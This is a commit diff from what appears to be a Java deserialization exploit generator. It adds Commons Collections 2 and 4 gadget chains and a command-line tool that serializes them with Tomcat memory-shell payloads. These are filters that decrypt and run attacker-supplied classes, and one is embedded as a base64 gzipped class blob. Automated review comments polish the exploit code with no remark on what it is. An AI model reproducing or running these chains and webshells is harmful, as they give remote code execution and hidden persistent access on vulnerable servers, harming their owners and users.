
Code refactoring
Signed-off-by: XhstormR <[email protected]>
XhstormR committed Jul 15, 2020
1 parent 520562a commit 17b6de6
Showing 9 changed files with 87 additions and 53 deletions.
2 changes: 1 addition & 1 deletion assets/run.bat
@@ -1 +1 @@
busybox gzip -9 -c -k FilterImpl.class | busybox base64 | busybox tr -d "\n" > 123.txt
busybox gzip -9 -c -k FilterImpl.class | busybox base64 | busybox tr -d "\n" > FilterImpl.class.txt
6 changes: 1 addition & 5 deletions src/main/java/com/xhstormr/app/TomcatBehinderFilter.java
Expand Up @@ -42,11 +42,7 @@ public void doFilter(ServletRequest request, ServletResponse response, FilterCha
c.init(2, new SecretKeySpec(session.getAttribute("u").toString().getBytes(), "AES"));
byte[] bytes = c.doFinal(Base64.getDecoder().decode(req.getReader().readLine()));

Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class<?> clazz = (Class<?>) defineClass.invoke(new TomcatBehinderFilter(), bytes, 0, bytes.length);

clazz.newInstance().equals(new Object[]{req, rsp});
new TomcatBehinderFilter().defineClass(null, bytes, 0, bytes.length).newInstance().equals(new Object[]{req, rsp});
return;
} catch (Exception e) {
e.printStackTrace();
Expand Up @@ -16,7 +16,7 @@ public class TomcatBehinderFilterTemplatesImpl extends AbstractTranslet {

static {
try {
String base64 = "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";
String base64 = "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";
byte[] bytes = ungzip(Base64.getDecoder().decode(base64));
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
4 changes: 4 additions & 0 deletions src/main/java/com/xhstormr/app/TomcatShellFilter.java
Expand Up @@ -83,3 +83,7 @@ public void init(FilterConfig filterConfig) {
public void destroy() {
}
}

/*
https://mp.weixin.qq.com/s/whOYVsI-AkvUJTeeDWL5dA
*/
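--- a/src/main/kotlin/com/xhstormr/app/Chain.kt
+++ b/src/main/kotlin/com/xhstormr/app/Chain.kt
@@ -0,0 +1,70 @@
+package com.xhstormr.app
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
+import java.util.PriorityQueue
+import javax.xml.transform.Templates
+import org.apache.commons.collections4.Transformer
+import org.apache.commons.collections4.comparators.TransformingComparator
+import org.apache.commons.collections4.functors.ChainedTransformer
+import org.apache.commons.collections4.functors.ConstantTransformer
+import org.apache.commons.collections4.functors.InstantiateTransformer
+import org.apache.commons.collections4.functors.InvokerTransformer
+
+enum class Chain {
+
+CommonsCollections2Chain {
+override fun generate(payload: Class<*>): Any {
+val templates = Gadgets.createTemplatesImpl(payload)
+// mock method name until armed
+val transformer = InvokerTransformer<Any, Any>(
+"toString",
+arrayOfNulls(0),
+arrayOfNulls(0)
+)
+
+// create queue with numbers and basic comparator
+val queue = PriorityQueue(2, TransformingComparator(transformer))
+// stub data for replacement later
+queue.add(1)
+queue.add(1)
+
+// switch method called by comparator
+transformer.setFieldValue("iMethodName", "newTransformer")
+
+// switch contents of queue
+val queueArray = queue.getFieldValue("queue") as Array<Any>
+queueArray[0] = templates
+queueArray[1] = 1
+return queue
+}
+},
+
+CommonsCollections4Chain {
+override fun generate(payload: Class<*>): Any {
+val templates = Gadgets.createTemplatesImpl(payload)
+val constant = ConstantTransformer<Any, Any>(String::class.java)
+
+// mock method name until armed
+var paramTypes: Array<Class<*>> = arrayOf(String::class.java)
+var args: Array<Any> = arrayOf("foo")
+val instantiate = InstantiateTransformer<Any>(paramTypes, args)
+
+// grab defensively copied arrays
+paramTypes = instantiate.getFieldValue("iParamTypes") as Array<Class<*>>
+args = instantiate.getFieldValue("iArgs") as Array<Any>
+val chain = ChainedTransformer<Any>(constant as Transformer<Any, Any>, instantiate as Transformer<Any, Any>)
+
+// create queue with numbers
+val queue = PriorityQueue(2, TransformingComparator(chain))
+queue.add(1)
+queue.add(1)
+
+constant.setFieldValue("iConstant", TrAXFilter::class.java)
+paramTypes[0] = Templates::class.java
+args[0] = templates
+return queue
+}
+};
+
+abstract fun generate(payload: Class<*>): Any
+}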
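Review bot: The `as Array<Any>` and `as Array<Class<*>>` casts applied to the `getFieldValue` results in both `generate` bodies are unchecked casts the compiler warns about on every build, and in `CommonsCollections4Chain` they are the only reason `paramTypes` and `args` are declared `var`. Construct `instantiate` from literal arrays and bind the copies once, e.g. `@Suppress("UNCHECKED_CAST") val paramTypes = instantiate.getFieldValue("iParamTypes") as Array<Class<*>>`, with the same form for `args` and for the `queue` cast in `CommonsCollections2Chain`. `getFieldValue` and `setFieldValue` are not imported in this file, so they are presumably package-level reflection helpers; a KDoc line on the abstract `generate` stating what the returned `Any` holds would help, since each constant visibly returns a `PriorityQueue` that callers only see as `Any`.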

This file was deleted.

14 changes: 8 additions & 6 deletions src/main/kotlin/com/xhstormr/app/Main.kt
Expand Up @@ -10,23 +10,25 @@ import java.util.Base64

object App : CliktCommand(printHelpOnEmptyArgs = true) {

private val chain by option().enum<Chain>().required()

private val payload by option(help = "Password: xhstormr").enum<Payload>().required()

override fun run() {
// exploit(CommonsCollections2ObjectPayload, clazz<TomcatShellFilterTemplatesImpl>())
// exploit(CommonsCollections2ObjectPayload, clazz<TomcatBehinderFilterTemplatesImpl>())
// exploit(Chain.CommonsCollections2Chain, clazz<TomcatShellFilterTemplatesImpl>())
// exploit(Chain.CommonsCollections2Chain, clazz<TomcatBehinderFilterTemplatesImpl>())

CommonsCollections2ObjectPayload
.getObject(payload.clazz)
chain
.generate(payload.clazz)
.serialize(System.out)
}
}

fun main(args: Array<String>) = App.main(args)

fun exploit(payload: ObjectPayload, clazz: Class<*>) {
fun exploit(chain: Chain, payload: Class<*>) {
try {
val any = payload.getObject(clazz)
val any = chain.generate(payload)
println(any)
ObjectInputStream(ByteArrayInputStream(any.serialize()))
.readObject()
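Review bot: The two commented-out `exploit(...)` calls at the top of `run()` are dead code that this commit rewrites by hand to the new `Chain` API; delete them rather than keep maintaining them, since `exploit` remains a top-level function and the comments will drift again the next time its signature changes. The new `run()` body otherwise reads cleanly as `chain.generate(payload.clazz).serialize(System.out)`. `exploit` gets its new signature here, but its body continues outside the hunk.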
5 changes: 0 additions & 5 deletions src/main/kotlin/com/xhstormr/app/ObjectPayload.kt

This file was deleted.

4 changes: 2 additions & 2 deletions src/main/kotlin/com/xhstormr/app/Payload.kt
@@ -1,6 +1,6 @@
package com.xhstormr.app

enum class Payload(val clazz: Class<*>) {
CommonsCollections2ForTomcatShell(clazz<TomcatShellFilterTemplatesImpl>()),
CommonsCollections2ForTomcatBehinder(clazz<TomcatBehinderFilterTemplatesImpl>());
TomcatShell(clazz<TomcatShellFilterTemplatesImpl>()),
TomcatBehinder(clazz<TomcatBehinderFilterTemplatesImpl>());
}
